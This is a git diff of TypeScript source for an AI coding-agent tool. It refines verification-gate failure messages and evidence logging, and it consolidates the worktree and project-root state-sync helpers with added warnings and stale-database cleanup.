-        `Verification failed — auto-fix attempt ${nextAttempt}/${maxRetries}`,
+        `Verification failed (${cmdSummary}) — auto-fix attempt ${nextAttempt}/${maxRetries}`,
         "warning",
       );
       // Return "retry" — the autoLoop while loop will re-iterate with the retry context
       return "retry";
     } else {
       // Gate failed, retries exhausted
-      const exhaustedAttempt = attempt + 1;
       s.verificationRetryCount.delete(s.currentUnit.id);
       s.pendingVerificationRetry = null;
+      const exhaustedFails = result.checks
+        .filter((c) => c.exitCode !== 0)
+        .map((c) => c.command);
+      const exhaustedSummary = exhaustedFails.length <= 3
+        ? exhaustedFails.join(", ")
+        : `${exhaustedFails.slice(0, 3).join(", ")}... and ${exhaustedFails.length - 3} more`;
       ctx.ui.notify(
-        `Verification gate FAILED after ${exhaustedAttempt > maxRetries ? exhaustedAttempt - 1 : exhaustedAttempt} retries — pausing for human review`,
+        `Verification gate FAILED after ${attempt} ${attempt === 1 ? "retry" : "retries"} (${exhaustedSummary}) — pausing for human review`,
         "error",
       );
       await pauseAuto(ctx, pi);
@@ -225,9 +359,63 @@ export async function runPostUnitVerification(
     }
   } catch (err) {
     // Gate errors are non-fatal
-    process.stderr.write(
-      `verification-gate: error — ${(err as Error).message}\n`,
-    );
+    logWarning("engine", `verification-gate error: ${(err as Error).message}`);
     return "continue";
   }
 }
+
+/**
+ * Write verification evidence JSON with post-execution checks included.
+ * This is a variant of writeVerificationJSON that adds the postExecutionChecks field.
+ */
+function writeVerificationJSONWithPostExec(
+  result: VerificationGateResult,
+  tasksDir: string,
+  taskId: string,
+  unitId: string,
+  postExecutionChecks: PostExecutionCheckJSON[],
+  retryAttempt?: number,
+  maxRetries?: number,
+): void {
+  mkdirSync(tasksDir, { recursive: true });
+
+  const evidence: EvidenceJSON = {
+    schemaVersion: 1,
+    taskId,
+    unitId: unitId ?? taskId,
+    timestamp: result.timestamp,
+    passed: result.passed,
+    discoverySource: result.discoverySource,
+    checks: result.checks.map((check) => ({
+      command: check.command,
+      exitCode: check.exitCode,
+      durationMs: check.durationMs,
+      verdict: check.exitCode === 0 ? "pass" : "fail",
+    })),
+    ...(retryAttempt !== undefined ? { retryAttempt } : {}),
+    ...(maxRetries !== undefined ? { maxRetries } : {}),
+    postExecutionChecks,
+  };
+
+  if (result.runtimeErrors && result.runtimeErrors.length > 0) {
+    evidence.runtimeErrors = result.runtimeErrors.map(e => ({
+      source: e.source,
+      severity: e.severity,
+      message: e.message,
+      blocking: e.blocking,
+    }));
+  }
+
+  if (result.auditWarnings && result.auditWarnings.length > 0) {
+    evidence.auditWarnings = result.auditWarnings.map(w => ({
+      name: w.name,
+      severity: w.severity,
+      title: w.title,
+      url: w.url,
+      fixAvailable: w.fixAvailable,
+    }));
+  }
+
+  const filePath = join(tasksDir, `${taskId}-VERIFY.json`);
+  writeFileSync(filePath, JSON.stringify(evidence, null, 2) + "\n", "utf-8");
+}
diff --git a/src/resources/extensions/gsd/auto-worktree-sync.ts b/src/resources/extensions/gsd/auto-worktree-sync.ts
deleted file mode 100644
index 643576098..000000000
--- a/src/resources/extensions/gsd/auto-worktree-sync.ts
+++ /dev/null
@@ -1,229 +0,0 @@
-/**
- * Worktree ↔ project root state synchronization for auto-mode.
- *
- * When auto-mode runs inside a worktree, dispatch-critical state files
- * (.gsd/ metadata) diverge between the worktree (where work happens)
- * and the project root (where startAutoMode reads initial state on restart).
- * Without syncing, restarting auto-mode reads stale state from the project
- * root and re-dispatches already-completed units.
- *
- * Also contains resource staleness detection and stale worktree escape.
- */
-
-import {
-  existsSync,
-  mkdirSync,
-  readFileSync,
-  cpSync,
-  unlinkSync,
-  readdirSync,
-} from "node:fs";
-import { join, sep as pathSep } from "node:path";
-import { homedir } from "node:os";
-import { safeCopy, safeCopyRecursive } from "./safe-fs.js";
-
-const gsdHome = process.env.GSD_HOME || join(homedir(), ".gsd");
-
-// ─── Project Root → Worktree Sync ─────────────────────────────────────────
-
-/**
- * Sync milestone artifacts from project root INTO worktree before deriveState.
- * Covers the case where the LLM wrote artifacts to the main repo filesystem
- * (e.g. via absolute paths) but the worktree has stale data. Also deletes
- * gsd.db in the worktree so it rebuilds from fresh disk state (#853).
- * Non-fatal — sync failure should never block dispatch.
- */
-export function syncProjectRootToWorktree(
-  projectRoot: string,
-  worktreePath: string,
-  milestoneId: string | null,
-): void {
-  if (!worktreePath || !projectRoot || worktreePath === projectRoot) return;
-  if (!milestoneId) return;
-
-  const prGsd = join(projectRoot, ".gsd");
-  const wtGsd = join(worktreePath, ".gsd");
-
-  // Copy milestone directory from project root to worktree if the project root
-  // has newer artifacts (e.g. slices that don't exist in the worktree yet)
-  safeCopyRecursive(
-    join(prGsd, "milestones", milestoneId),
-    join(wtGsd, "milestones", milestoneId),
-  );
-
-  // Delete worktree gsd.db so it rebuilds from the freshly synced files.
-  // Stale DB rows are the root cause of the infinite skip loop (#853).
-  try {
-    const wtDb = join(wtGsd, "gsd.db");
-    if (existsSync(wtDb)) {
-      unlinkSync(wtDb);
-    }
-  } catch {
-    /* non-fatal */
-  }
-}
-
-// ─── Worktree → Project Root Sync ─────────────────────────────────────────
-
-/**
- * Sync dispatch-critical .gsd/ state files from worktree to project root.
- * Only runs when inside an auto-worktree (worktreePath differs from projectRoot).
- * Copies: STATE.md + active milestone directory (roadmap, slice plans, task summaries).
- * Non-fatal — sync failure should never block dispatch.
- */
-export function syncStateToProjectRoot(
-  worktreePath: string,
-  projectRoot: string,
-  milestoneId: string | null,
-): void {
-  if (!worktreePath || !projectRoot || worktreePath === projectRoot) return;
-  if (!milestoneId) return;
-
-  const wtGsd = join(worktreePath, ".gsd");
-  const prGsd = join(projectRoot, ".gsd");
-
-  // 1. STATE.md — the quick-glance status used by initial deriveState()
-  safeCopy(join(wtGsd, "STATE.md"), join(prGsd, "STATE.md"), { force: true });
-
-  // 2. Milestone directory — ROADMAP, slice PLANs, task summaries
-  // Copy the entire milestone .gsd subtree so deriveState reads current checkboxes
-  safeCopyRecursive(
-    join(wtGsd, "milestones", milestoneId),
-    join(prGsd, "milestones", milestoneId),
-    { force: true },
-  );
-
-  // 4. Runtime records — unit dispatch state used by selfHealRuntimeRecords().
-  // Without this, a crash during a unit leaves the runtime record only in the
-  // worktree. If the next session resolves basePath before worktree re-entry,
-  // selfHeal can't find or clear the stale record (#769).
-  safeCopyRecursive(
-    join(wtGsd, "runtime", "units"),
-    join(prGsd, "runtime", "units"),
-    { force: true },
-  );
-}
-
-// ─── Resource Staleness ───────────────────────────────────────────────────
-
-/**
- * Read the resource version (semver) from the managed-resources manifest.
- * Uses gsdVersion instead of syncedAt so that launching a second session
- * doesn't falsely trigger staleness (#804).
- */
-export function readResourceVersion(): string | null {
-  const agentDir =
-    process.env.GSD_CODING_AGENT_DIR || join(gsdHome, "agent");
-  const manifestPath = join(agentDir, "managed-resources.json");
-  try {
-    const manifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
-    return typeof manifest?.gsdVersion === "string"
-      ? manifest.gsdVersion
-      : null;
-  } catch {
-    return null;
-  }
-}
-
-/**
- * Check if managed resources have been updated since session start.
- * Returns a warning message if stale, null otherwise.
- */
-export function checkResourcesStale(
-  versionOnStart: string | null,
-): string | null {
-  if (versionOnStart === null) return null;
-  const current = readResourceVersion();
-  if (current === null) return null;
-  if (current !== versionOnStart) {
-    return "GSD resources were updated since this session started. Restart gsd to load the new code.";
-  }
-  return null;
-}
-
-// ─── Stale Worktree Escape ────────────────────────────────────────────────
-
-/**
- * Detect and escape a stale worktree cwd (#608).
- *
- * After milestone completion + merge, the worktree directory is removed but
- * the process cwd may still point inside `.gsd/worktrees/<MID>/`.
- * When a new session starts, `process.cwd()` is passed as `base` to startAuto
- * and all subsequent writes land in the wrong directory. This function detects
- * that scenario and chdir back to the project root.
- *
- * Returns the corrected base path.
- */
-export function escapeStaleWorktree(base: string): string {
-  // Direct layout: /.gsd/worktrees/
-  const directMarker = `${pathSep}.gsd${pathSep}worktrees${pathSep}`;
-  let idx = base.indexOf(directMarker);
-  if (idx === -1) {
-    // Symlink-resolved layout: /.gsd/projects/<hash>/worktrees/
-    const symlinkRe = new RegExp(
-      `\\${pathSep}\\.gsd\\${pathSep}projects\\${pathSep}[a-f0-9]+\\${pathSep}worktrees\\${pathSep}`,
-    );
-    const match = base.match(symlinkRe);
-    if (!match || match.index === undefined) return base;
-    idx = match.index;
-  }
-
-  // base is inside .gsd/worktrees/<something> — extract the project root
-  const projectRoot = base.slice(0, idx);
-
-  // Guard: If the candidate project root's .gsd IS the user-level ~/.gsd,
-  // the string-slice heuristic matched the wrong /.gsd/ boundary. This happens
-  // when .gsd is a symlink into ~/.gsd/projects/<hash> and process.cwd()
-  // resolved through the symlink. Returning ~ would be catastrophic (#1676).
-  const candidateGsd = join(projectRoot, ".gsd").replaceAll("\\", "/");
-  const gsdHomePath = gsdHome.replaceAll("\\", "/");
-  if (candidateGsd === gsdHomePath || candidateGsd.startsWith(gsdHomePath + "/")) {
-    // Don't chdir to home — return base unchanged.
-    // resolveProjectRoot() in worktree.ts has the full git-file-based recovery
-    // and will be called by the caller (startAuto → projectRoot()).
-    return base;
-  }
-
-  try {
-    process.chdir(projectRoot);
-  } catch {
-    // If chdir fails, return the original — caller will handle errors downstream
-    return base;
-  }
-  return projectRoot;
-}
-
-/**
- * Clean stale runtime unit files for completed milestones.
- *
- * After restart, stale runtime/units/*.json from prior milestones can
- * cause deriveState to resume the wrong milestone (#887). Removes files
- * for milestones that have a SUMMARY (fully complete).
- */
-export function cleanStaleRuntimeUnits(
-  gsdRootPath: string,
-  hasMilestoneSummary: (mid: string) => boolean,
-): number {
-  const runtimeUnitsDir = join(gsdRootPath, "runtime", "units");
-  if (!existsSync(runtimeUnitsDir)) return 0;
-
-  let cleaned = 0;
-  try {
-    for (const file of readdirSync(runtimeUnitsDir)) {
-      if (!file.endsWith(".json")) continue;
-      const midMatch = file.match(/(M\d+(?:-[a-z0-9]{6})?)/);
-      if (!midMatch) continue;
-      if (hasMilestoneSummary(midMatch[1])) {
-        try {
-          unlinkSync(join(runtimeUnitsDir, file));
-          cleaned++;
-        } catch {
-          /* non-fatal */
-        }
-      }
-    }
-  } catch {
-    /* non-fatal */
-  }
-  return cleaned;
-}
diff --git a/src/resources/extensions/gsd/auto-worktree.ts b/src/resources/extensions/gsd/auto-worktree.ts
index 1ee7a4817..0ff06f4bf 100644
--- a/src/resources/extensions/gsd/auto-worktree.ts
+++ b/src/resources/extensions/gsd/auto-worktree.ts
@@ -15,14 +15,17 @@ import {
   realpathSync,
   rmSync,
   unlinkSync,
+  statSync,
   lstatSync as lstatSyncFn,
 } from "node:fs";
-import { isAbsolute, join } from "node:path";
+import { isAbsolute, join, sep as pathSep } from "node:path";
+import { homedir } from "node:os";
 import { GSDError, GSD_IO_ERROR, GSD_GIT_ERROR } from "./errors.js";
 import {
-  copyWorktreeDb,
   reconcileWorktreeDb,
   isDbAvailable,
+  getMilestone,
+  getMilestoneSlices,
 } from "./gsd-db.js";
 import { atomicWriteSync } from "./atomic-write.js";
 import { execFileSync } from "node:child_process";
@@ -33,6 +36,7 @@ import {
   removeWorktree,
   resolveGitDir,
   worktreePath,
+  isInsideWorktreesDir,
 } from "./worktree-manager.js";
 import {
   detectWorktreeName,
@@ -41,7 +45,7 @@ import {
 } from "./worktree.js";
 import { MergeConflictError, readIntegrationBranch, RUNTIME_EXCLUSION_PATHS } from "./git-service.js";
 import { debugLog } from "./debug-logger.js";
-import { parseRoadmap } from "./files.js";
+import { logWarning, logError } from "./workflow-logger.js";
 import { loadEffectiveGSDPreferences } from "./preferences.js";
 import {
   nativeGetCurrentBranch,
@@ -60,8 +64,113 @@ import {
   nativeDiffNumstat,
   nativeUpdateRef,
   nativeIsAncestor,
+  nativeMergeAbort,
 } from "./native-git-bridge.js";
 
+const gsdHome = process.env.GSD_HOME || join(homedir(), ".gsd");
+const PROJECT_PREFERENCES_FILE = "PREFERENCES.md";
+const LEGACY_PROJECT_PREFERENCES_FILE = "preferences.md";
+
+// ─── Shared Constants & Helpers ─────────────────────────────────────────────
+
+/**
+ * Root-level .gsd/ state files synced between worktree and project root.
+ * Single source of truth — used by syncGsdStateToWorktree, syncWorktreeStateBack,
+ * and the dispatch-level sync functions.
+ */
+const ROOT_STATE_FILES = [
+  "DECISIONS.md",
+  "REQUIREMENTS.md",
+  "PROJECT.md",
+  "KNOWLEDGE.md",
+  "OVERRIDES.md",
+  "QUEUE.md",
+  "completed-units.json",
+  "metrics.json",
+  "mcp.json",
+  // NOTE: project preferences are intentionally NOT in ROOT_STATE_FILES.
+  // Forward-sync (main → worktree) is handled explicitly in syncGsdStateToWorktree().
+  // Back-sync (worktree → main) must NEVER overwrite the project root's copy
+  // because the project root is authoritative for preferences (#2684).
+] as const;
+
+/**
+ * Check if two filesystem paths resolve to the same real location.
+ * Returns false if either path cannot be resolved (e.g. doesn't exist).
+ */
+function isSamePath(a: string, b: string): boolean {
+  try {
+    return realpathSync(a) === realpathSync(b);
+  } catch (e) {
+    logWarning("worktree", `isSamePath failed: ${(e as Error).message}`);
+    return false;
+  }
+}
+
+// ─── ASSESSMENT Force-Sync Helper (#2821) ─────────────────────────────────
+
+/** Regex matching YAML frontmatter `verdict:` field. */
+const VERDICT_RE = /verdict:\s*[\w-]+/i;
+
+/**
+ * Walk a milestone directory and force-overwrite ASSESSMENT files in the
+ * destination when the source copy contains a `verdict:` field.
+ *
+ * This is the targeted fix for the UAT stuck-loop (#2821): the main
+ * safeCopyRecursive uses force:false to protect worktree-authoritative
+ * files (#1886), but ASSESSMENT files written by run-uat must be
+ * forward-synced when the project root has a verdict. Without this,
+ * the worktree retains a stale FAIL or missing ASSESSMENT and
+ * checkNeedsRunUat re-dispatches run-uat indefinitely.
+ *
+ * Only overwrites when the source has a verdict — never clobbers a
+ * worktree ASSESSMENT with a verdictless project-root copy.
+ */
+function forceOverwriteAssessmentsWithVerdict(
+  srcMilestoneDir: string,
+  dstMilestoneDir: string,
+): void {
+  if (!existsSync(srcMilestoneDir)) return;
+
+  // Walk slices/<SID>/ looking for *-ASSESSMENT.md files
+  const slicesDir = join(srcMilestoneDir, "slices");
+  if (!existsSync(slicesDir)) return;
+
+  try {
+    for (const sliceEntry of readdirSync(slicesDir, { withFileTypes: true })) {
+      if (!sliceEntry.isDirectory()) continue;
+      const srcSliceDir = join(slicesDir, sliceEntry.name);
+      const dstSliceDir = join(dstMilestoneDir, "slices", sliceEntry.name);
+
+      try {
+        for (const fileEntry of readdirSync(srcSliceDir, { withFileTypes: true })) {
+          if (!fileEntry.isFile()) continue;
+          if (!fileEntry.name.endsWith("-ASSESSMENT.md")) continue;
+
+          const srcFile = join(srcSliceDir, fileEntry.name);
+          try {
+            const srcContent = readFileSync(srcFile, "utf-8");
+            if (!VERDICT_RE.test(srcContent)) continue; // no verdict in source — skip
+
+            // Source has a verdict — force-copy into worktree
+            mkdirSync(dstSliceDir, { recursive: true });
+            safeCopy(srcFile, join(dstSliceDir, fileEntry.name), { force: true });
+          } catch (err) {
+            /* non-fatal per file */
+            logWarning("worktree", `assessment force-copy failed: ${err instanceof Error ? err.message : String(err)}`);
+          }
+        }
+      } catch (err) {
+        /* non-fatal per slice */
+        logWarning("worktree", `assessment slice scan failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
+    }
+  } catch (err) {
+    /* non-fatal */
+    logWarning("worktree", `assessment sync failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+}
+
 // ─── Module State ──────────────────────────────────────────────────────────
 
 /** Original project root before chdir into auto-worktree. */
@@ -78,8 +187,11 @@ function clearProjectRootStateFiles(basePath: string, milestoneId: string): void
   for (const file of transientFiles) {
     try {
       unlinkSync(file);
-    } catch {
-      /* non-fatal — file may not exist */
+    } catch (err) {
+      // ENOENT is expected — file may not exist (#3597)
+      if ((err as NodeJS.ErrnoException).code !== "ENOENT") {
+        logWarning("worktree", `file unlink failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
     }
   }
 
@@ -107,17 +219,314 @@ function clearProjectRootStateFiles(basePath: string, milestoneId: string): void
           for (const f of untrackedOutput.split("\n").filter(Boolean)) {
             try {
               unlinkSync(join(basePath, f));
-            } catch {
-              /* non-fatal */
+            } catch (err) {
+              // ENOENT/EISDIR are expected for already-removed or directory entries (#3597)
+              const code = (err as NodeJS.ErrnoException).code;
+              if (code !== "ENOENT" && code !== "EISDIR") {
+                logWarning("worktree", `untracked file unlink failed: ${err instanceof Error ? err.message : String(err)}`);
+              }
             }
           }
         }
       }
-    } catch {
+    } catch (err) {
       /* non-fatal — git command may fail if not in repo */
+      logWarning("worktree", `untracked file cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
     }
   }
 }
+
+// ─── Build Artifact Auto-Resolve ─────────────────────────────────────────────
+
+/** Patterns for machine-generated build artifacts that can be safely
+ * auto-resolved by accepting --theirs during merge. These files are
+ * regenerable and never contain meaningful manual edits. */
+export const SAFE_AUTO_RESOLVE_PATTERNS: RegExp[] = [
+  /\.tsbuildinfo$/,
+  /\.pyc$/,
+  /\/__pycache__\//,
+  /\.DS_Store$/,
+  /\.map$/,
+];
+
+/** Returns true if the file path is safe to auto-resolve during merge.
+ * Covers `.gsd/` state files and common build artifacts. */
+export const isSafeToAutoResolve = (filePath: string): boolean =>
+  filePath.startsWith(".gsd/") ||
+  SAFE_AUTO_RESOLVE_PATTERNS.some((re) => re.test(filePath));
+
+// ─── Dispatch-Level Sync (project root ↔ worktree) ──────────────────────────
+
+/**
+ * Sync milestone artifacts from project root INTO worktree before deriveState.
+ * Covers the case where the LLM wrote artifacts to the main repo filesystem
+ * (e.g. via absolute paths) but the worktree has stale data. Also deletes
+ * gsd.db in the worktree so it rebuilds from fresh disk state (#853).
+ * Non-fatal — sync failure should never block dispatch.
+ */
+export function syncProjectRootToWorktree(
+  projectRoot: string,
+  worktreePath_: string,
+  milestoneId: string | null,
+): void {
+  if (!worktreePath_ || !projectRoot || worktreePath_ === projectRoot) return;
+  if (!milestoneId) return;
+
+  const prGsd = join(projectRoot, ".gsd");
+  const wtGsd = join(worktreePath_, ".gsd");
+
+  // When .gsd is a symlink to the same external directory in both locations,
+  // cpSync rejects the copy because source === destination (ERR_FS_CP_EINVAL).
+  // Compare realpaths and skip when they resolve to the same physical path (#2184).
+  if (isSamePath(prGsd, wtGsd)) return;
+
+  // Copy milestone directory from project root to worktree — additive only.
+  // force:false prevents cpSync from overwriting existing worktree files.
+  // Without this, worktree-authoritative files (e.g. VALIDATION.md written
+  // by validate-milestone) get clobbered by stale project root copies,
+  // causing an infinite re-validation loop (#1886).
+  safeCopyRecursive(
+    join(prGsd, "milestones", milestoneId),
+    join(wtGsd, "milestones", milestoneId),
+    { force: false },
+  );
+
+  // Force-sync ASSESSMENT files that have a verdict from project root (#2821).
+  // The additive-only copy above preserves worktree-authoritative files, but
+  // ASSESSMENT files are special: after run-uat writes a verdict and post-unit
+  // syncs it to the project root, the worktree may retain a stale copy (e.g.
+  // verdict:fail while the project root has verdict:pass from a retry). On
+  // session resume the DB is rebuilt from disk, and if the stale ASSESSMENT
+  // persists, checkNeedsRunUat finds no passing verdict → re-dispatches
+  // run-uat indefinitely (stuck-loop ×9).
+  forceOverwriteAssessmentsWithVerdict(
+    join(prGsd, "milestones", milestoneId),
+    join(wtGsd, "milestones", milestoneId),
+  );
+
+  // Forward-sync completed-units.json from project root to worktree.
+  // Project root is authoritative for completion state after crash recovery;
+  // without this, the worktree re-dispatches already-completed units (#1886).
+  safeCopy(
+    join(prGsd, "completed-units.json"),
+    join(wtGsd, "completed-units.json"),
+    { force: true },
+  );
+
+  // Delete worktree gsd.db ONLY if it is empty (0 bytes).
+  // An empty DB is stale/corrupt and should be rebuilt (#853).
+  // A non-empty DB was populated by gsd-migrate on respawn and must be
+  // preserved — deleting it truncates the file to 0 bytes when
+  // openDatabase re-creates it, causing "no such table" failures (#2815).
+  try {
+    const wtDb = join(wtGsd, "gsd.db");
+    let deleteSidecars = false;
+    if (existsSync(wtDb)) {
+      const size = statSync(wtDb).size;
+      if (size === 0) {
+        unlinkSync(wtDb);
+        deleteSidecars = true;
+      }
+    } else {
+      // Main DB already missing — sidecars are orphaned from a previous
+      // partial cleanup and must still be removed.
+      deleteSidecars = true;
+    }
+    // Always clean up WAL/SHM sidecar files when the main DB was deleted
+    // or is already missing. Orphaned WAL/SHM files cause SQLite WAL
+    // recovery on next open, which triggers a CPU spin on Node 24's
+    // node:sqlite DatabaseSync implementation (#2478).
+    if (deleteSidecars) {
+      for (const suffix of ["-wal", "-shm"]) {
+        const f = wtDb + suffix;
+        if (existsSync(f)) {
+          unlinkSync(f);
+        }
+      }
+    }
+  } catch (err) {
+    /* non-fatal */
+    logWarning("worktree", `worktree DB cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+}
+
+/**
+ * Sync dispatch-critical .gsd/ state files from worktree to project root.
+ * Only runs when inside an auto-worktree (worktreePath differs from projectRoot).
+ * Copies: STATE.md + active milestone directory (roadmap, slice plans, task summaries).
+ * Non-fatal — sync failure should never block dispatch.
+ */
+export function syncStateToProjectRoot(
+  worktreePath_: string,
+  projectRoot: string,
+  milestoneId: string | null,
+): void {
+  if (!worktreePath_ || !projectRoot || worktreePath_ === projectRoot) return;
+  if (!milestoneId) return;
+
+  const wtGsd = join(worktreePath_, ".gsd");
+  const prGsd = join(projectRoot, ".gsd");
+
+  // When .gsd is a symlink to the same external directory in both locations,
+  // cpSync rejects the copy because source === destination (ERR_FS_CP_EINVAL).
+  // Compare realpaths and skip when they resolve to the same physical path (#2184).
+  if (isSamePath(wtGsd, prGsd)) return;
+
+  // 1. STATE.md — the quick-glance status used by initial deriveState()
+  safeCopy(join(wtGsd, "STATE.md"), join(prGsd, "STATE.md"), { force: true });
+
+  // 2. Milestone directory — ROADMAP, slice PLANs, task summaries
+  // Copy the entire milestone .gsd subtree so deriveState reads current checkboxes
+  safeCopyRecursive(
+    join(wtGsd, "milestones", milestoneId),
+    join(prGsd, "milestones", milestoneId),
+    { force: true },
+  );
+
+  // 3. metrics.json — session cost/token tracking (#2313).
+  // Without this, metrics accumulated in the worktree are invisible from the
+  // project root and never appear in the dashboard or skill-health reports.
+  safeCopy(join(wtGsd, "metrics.json"), join(prGsd, "metrics.json"), { force: true });
+
+  // 4. Runtime records — unit dispatch state used by selfHealRuntimeRecords().
+  // Without this, a crash during a unit leaves the runtime record only in the
+  // worktree. If the next session resolves basePath before worktree re-entry,
+  // selfHeal can't find or clear the stale record (#769).
+  safeCopyRecursive(
+    join(wtGsd, "runtime", "units"),
+    join(prGsd, "runtime", "units"),
+    { force: true },
+  );
+}
+
+// ─── Resource Staleness ───────────────────────────────────────────────────
+
+/**
+ * Read the resource version (semver) from the managed-resources manifest.
+ * Uses gsdVersion instead of syncedAt so that launching a second session
+ * doesn't falsely trigger staleness (#804).
+ */
+export function readResourceVersion(): string | null {
+  const agentDir =
+    process.env.GSD_CODING_AGENT_DIR || join(gsdHome, "agent");
+  const manifestPath = join(agentDir, "managed-resources.json");
+  try {
+    const manifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+    return typeof manifest?.gsdVersion === "string"
+      ? manifest.gsdVersion
+      : null;
+  } catch (e) {
+    logWarning("worktree", `readResourceVersion failed: ${(e as Error).message}`);
+    return null;
+  }
+}
+
+/**
+ * Check if managed resources have been updated since session start.
+ * Returns a warning message if stale, null otherwise.
+ */
+export function checkResourcesStale(
+  versionOnStart: string | null,
+): string | null {
+  if (versionOnStart === null) return null;
+  const current = readResourceVersion();
+  if (current === null) return null;
+  if (current !== versionOnStart) {
+    return "GSD resources were updated since this session started. Restart gsd to load the new code.";
+  }
+  return null;
+}
+
+// ─── Stale Worktree Escape ────────────────────────────────────────────────
+
+/**
+ * Detect and escape a stale worktree cwd (#608).
+ *
+ * After milestone completion + merge, the worktree directory is removed but
+ * the process cwd may still point inside `.gsd/worktrees/<MID>/`.
+ * When a new session starts, `process.cwd()` is passed as `base` to startAuto
+ * and all subsequent writes land in the wrong directory. This function detects
+ * that scenario and chdir back to the project root.
+ *
+ * Returns the corrected base path.
+ */
+export function escapeStaleWorktree(base: string): string {
+  // Direct layout: /.gsd/worktrees/
+  const directMarker = `${pathSep}.gsd${pathSep}worktrees${pathSep}`;
+  let idx = base.indexOf(directMarker);
+  if (idx === -1) {
+    // Symlink-resolved layout: /.gsd/projects/<hash>/worktrees/
+    const symlinkRe = new RegExp(
+      `\\${pathSep}\\.gsd\\${pathSep}projects\\${pathSep}[a-f0-9]+\\${pathSep}worktrees\\${pathSep}`,
+    );
+    const match = base.match(symlinkRe);
+    if (!match || match.index === undefined) return base;
+    idx = match.index;
+  }
+
+  // base is inside .gsd/worktrees/<something> — extract the project root
+  const projectRoot = base.slice(0, idx);
+
+  // Guard: If the candidate project root's .gsd IS the user-level ~/.gsd,
+  // the string-slice heuristic matched the wrong /.gsd/ boundary. This happens
+  // when .gsd is a symlink into ~/.gsd/projects/<hash> and process.cwd()
+  // resolved through the symlink. Returning ~ would be catastrophic (#1676).
+  const candidateGsd = join(projectRoot, ".gsd").replaceAll("\\", "/");
+  const gsdHomePath = gsdHome.replaceAll("\\", "/");
+  if (candidateGsd === gsdHomePath || candidateGsd.startsWith(gsdHomePath + "/")) {
+    // Don't chdir to home — return base unchanged.
+    // resolveProjectRoot() in worktree.ts has the full git-file-based recovery
+    // and will be called by the caller (startAuto → projectRoot()).
+    return base;
+  }
+
+  try {
+    process.chdir(projectRoot);
+  } catch (e) {
+    // If chdir fails, return the original — caller will handle errors downstream
+    logWarning("worktree", `escapeStaleWorktree chdir failed: ${(e as Error).message}`);
+    return base;
+  }
+  return projectRoot;
+}
+
+/**
+ * Clean stale runtime unit files for completed milestones.
+ *
+ * After restart, stale runtime/units/*.json from prior milestones can
+ * cause deriveState to resume the wrong milestone (#887). Removes files
+ * for milestones that have a SUMMARY (fully complete).
+ */
+export function cleanStaleRuntimeUnits(
+  gsdRootPath: string,
+  hasMilestoneSummary: (mid: string) => boolean,
+): number {
+  const runtimeUnitsDir = join(gsdRootPath, "runtime", "units");
+  if (!existsSync(runtimeUnitsDir)) return 0;
+
+  let cleaned = 0;
+  try {
+    for (const file of readdirSync(runtimeUnitsDir)) {
+      if (!file.endsWith(".json")) continue;
+      const midMatch = file.match(/(M\d+(?:-[a-z0-9]{6})?)/);
+      if (!midMatch) continue;
+      if (hasMilestoneSummary(midMatch[1])) {
+        try {
+          unlinkSync(join(runtimeUnitsDir, file));
+          cleaned++;
+        } catch (err) {
+          /* non-fatal */
+          logWarning("worktree", `stale runtime unit unlink failed (${file}): ${err instanceof Error ? err.message : String(err)}`);
+        }
+      }
+    }
+  } catch (err) {
+    /* non-fatal */
+    logWarning("worktree", `stale runtime unit cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+  return cleaned;
+}
+
 // ─── Worktree ↔ Main Repo Sync (#1311) ──────────────────────────────────────
 
 /**
@@ -143,35 +552,45 @@ export function syncGsdStateToWorktree(
   const synced: string[] = [];
 
   // If both resolve to the same directory (symlink), no sync needed
-  try {
-    const mainResolved = realpathSync(mainGsd);
-    const wtResolved = realpathSync(wtGsd);
-    if (mainResolved === wtResolved) return { synced };
-  } catch {
-    // Can't resolve — proceed with sync as a safety measure
-  }
+  if (isSamePath(mainGsd, wtGsd)) return { synced };
 
   if (!existsSync(mainGsd) || !existsSync(wtGsd)) return { synced };
 
   // Sync root-level .gsd/ files (DECISIONS, REQUIREMENTS, PROJECT, KNOWLEDGE, etc.)
-  const rootFiles = [
-    "DECISIONS.md",
-    "REQUIREMENTS.md",
-    "PROJECT.md",
-    "KNOWLEDGE.md",
-    "OVERRIDES.md",
-    "QUEUE.md",
-    "completed-units.json",
-  ];
-  for (const f of rootFiles) {
+  for (const f of ROOT_STATE_FILES) {
     const src = join(mainGsd, f);
     const dst = join(wtGsd, f);
     if (existsSync(src) && !existsSync(dst)) {
       try {
         cpSync(src, dst);
         synced.push(f);
-      } catch {
+      } catch (err) {
         /* non-fatal */
+        logWarning("worktree", `file copy failed (${f}): ${err instanceof Error ? err.message : String(err)}`);
+      }
+    }
+  }
+
+  // Forward-sync project preferences from project root to worktree (additive only).
+  // Prefer the canonical uppercase file name, but keep the legacy lowercase
+  // fallback so older repos still work on case-sensitive filesystems.
+  {
+    const worktreeHasPreferences = existsSync(join(wtGsd, PROJECT_PREFERENCES_FILE))
+      || existsSync(join(wtGsd, LEGACY_PROJECT_PREFERENCES_FILE));
+    if (!worktreeHasPreferences) {
+      for (const file of [PROJECT_PREFERENCES_FILE, LEGACY_PROJECT_PREFERENCES_FILE] as const) {
+        const src = join(mainGsd, file);
+        const dst = join(wtGsd, file);
+        if (existsSync(src)) {
+          try {
+            cpSync(src, dst);
+            synced.push(file);
+          } catch (err) {
+            /* non-fatal */
+            logWarning("worktree", `preferences copy failed (${file}): ${err instanceof Error ? err.message : String(err)}`);
+          }
+          break;
+        }
       }
     }
   }
@@ -197,8 +616,9 @@ export function syncGsdStateToWorktree(
           try {
             cpSync(srcDir, dstDir, { recursive: true });
             synced.push(`milestones/${mid}/`);
-          } catch {
+          } catch (err) {
             /* non-fatal */
+            logWarning("worktree", `milestone copy failed (${mid}): ${err instanceof Error ? err.message : String(err)}`);
           }
         } else {
           // Milestone directory exists but may be missing files (stale snapshot).
@@ -217,8 +637,9 @@ export function syncGsdStateToWorktree(
                     cpSync(srcFile, dstFile);
                     synced.push(`milestones/${mid}/${f}`);
                   }
-                } catch {
+                } catch (err) {
                   /* non-fatal */
+                  logWarning("worktree", `milestone file copy failed (${mid}/${f}): ${err instanceof Error ? err.message : String(err)}`);
                 }
               }
             }
@@ -230,8 +651,9 @@ export function syncGsdStateToWorktree(
